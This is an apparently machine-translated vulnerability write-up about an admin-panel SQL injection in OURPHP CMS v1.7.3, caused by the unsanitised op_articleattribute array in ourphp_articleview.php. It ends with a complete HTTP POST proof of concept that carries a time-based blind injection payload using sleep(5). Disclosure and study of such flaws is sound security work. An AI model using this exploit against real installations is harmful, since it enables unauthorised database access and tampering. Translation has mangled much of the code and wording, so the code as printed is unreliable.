Version
<? PHP /* ******************************************************************************* OURPHP-CMS Building Station System * COPYRIGHT (C) www.ourphp.net* Developer: Harbin Wei Cheng Technology Co., Ltd. **************************************************************************** * */$ourphp _version= "v1.7.3"; $ourphp _versiondate= "20170615"; $ourphp _weixin= "Close"; $ourphp _apps= "Close"; $ourphp _alifuwu= "Close";? >
First Look at index.php
The following files are loaded
include './config/ourphp_code.php '; include './config/ourphp_config.php '; include './config/ourphp_version.php '; include './config/ourphp_language.php '; include './function/ourphp_function.class.php '; include './function/ourphp/smarty.class.php '; include './function/ourphp_system.class.php '; include './function/ourphp_template.class.php ';
Where ourphp_function.class.php is some safe filter function
Bulk Search $_post
Picked up a place to follow in
\client\manage\ourphp_articleview.php Line 71st
$query=$dbUpdate ("' Ourphp_article '", "' op_articletitle ' = '"). Admin_sql ($_post["Op_articletitle"]). "', ' op_articleauthor ' = '". Admin_sql ($_post["Op_articleauthor"]). "', ' op_articlesource ' = '". Admin_sql ($_post["Op_articlesource"]). "', ' time ' = '".Date("Y-m-d h:i:s"). "', ' op_articlecontent ' = '". Admin_sql ($_post["Op_articlecontent"]). "', ' op_tag ' = '".$wordtag. "', ' op_class ' = '".$OP _articleclass[0]. "', ' op_lang ' = '".$OP _articleclass[1]. "', ' op_sorting ' = '". Admin_sql ($_post["Op_articlesorting"]). "', ' op_attribute ' = '".$OP _articleattribute. "', ' op_url ' = '". Admin_sql ($_post["Op_articleurl"]). "', ' op_description ' = '". Compress_html ($OP _articlecontent). "', ' op_minimg ' = '".$OP _minimg. "'", "where id =".intval($_get[' ID ']));
It is found that most of the parameters have been processed by the Admin_sql function, but the $OP _articleattribute has not been processed by Admin_sql.
Search $OP _articleattribute Discover
\client\manage\ourphp_articleview.php 第47-51 Line
if (! Empty ($_post["Op_articleattribute"])) { $OP _articleattributeimplode(', ',$_post["Op_articleattribute"]); } Else { $OP _articleattribute = '; }
Apparently, it's not handled.
This is the injection point of the update and is not echoed so it cannot be injected with an error.
Depending on the face $OP _articleattribute know that this should pass in the array
The monitoring SQL statement is
Update ' ourphp_article ' set ' op_articletitle ' = ' World, Hello! ', ' op_articleauthor ' = ', ' op_articlesource ' = ', ' time '= ' 2017-08-10 12:05:16 ', ' op_articlecontent ' = ' World, Hello! ', ' op_tag ' = ', ' op_class ' = ' 3 ', ' op_lang ' = ' cn ', ' op_sorting ' = ' a ', ' op_attribute ' = ' aaaaaaaaaaaaa,xxxxxxxxx ', ' op_ ' Url ' = ', ' op_description ' = ' World, Hello! ', ' op_minimg ' = ' skin/noimage.png ' WHERE id = 3
Bring in single quotation marks
Finally, we give the POC
Post/client/manage/ourphp_articleview.php?ourphp_cms=edit&id=3&page=1 HTTP/1.1Host: localhost.Comuser-agent:mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) gecko/20100101 firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*; Q=0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, deflatecookie:phpsessid= pnti0rkun1s1rrqhhl9n6lqdr1connection:closeupgrade-insecure-requests:1content-type:application/ x-www-form-urlencodedcontent-length:484op_articleclass=3%7ccn&op_articletitle=%e4%b8%96%e7%95%8c%ef%bc%8c% E4%bd%a0%e5%a5%bd%ef%bc%81&op_articleauthor=&op_articlesource=&a_upimg=skin%2fnoimage.png&op_ Articlecontent=%e4%b8%96%e7%95%8c%ef%bc%8c%e4%bd%a0%e5%a5%bd%ef%bc%81&op_articlesorting=99&op_ articleurl=&op_articletag=&op_articledescription=%e4%b8%96%e7%95%8c%ef%bc%8c%e4%bd%a0%e5%a5%bd%ef%bc% 81&submit=%e6%8f%90%2b%e4%ba%a4&op_articleattribute[0]=aaaaaaaaaaaaa&op_articleattribute[1]= Xxxxxxxxx ' where 1=1 and sleep (5)---
Ourphp Latest Version (v1.7.3) background SQL injection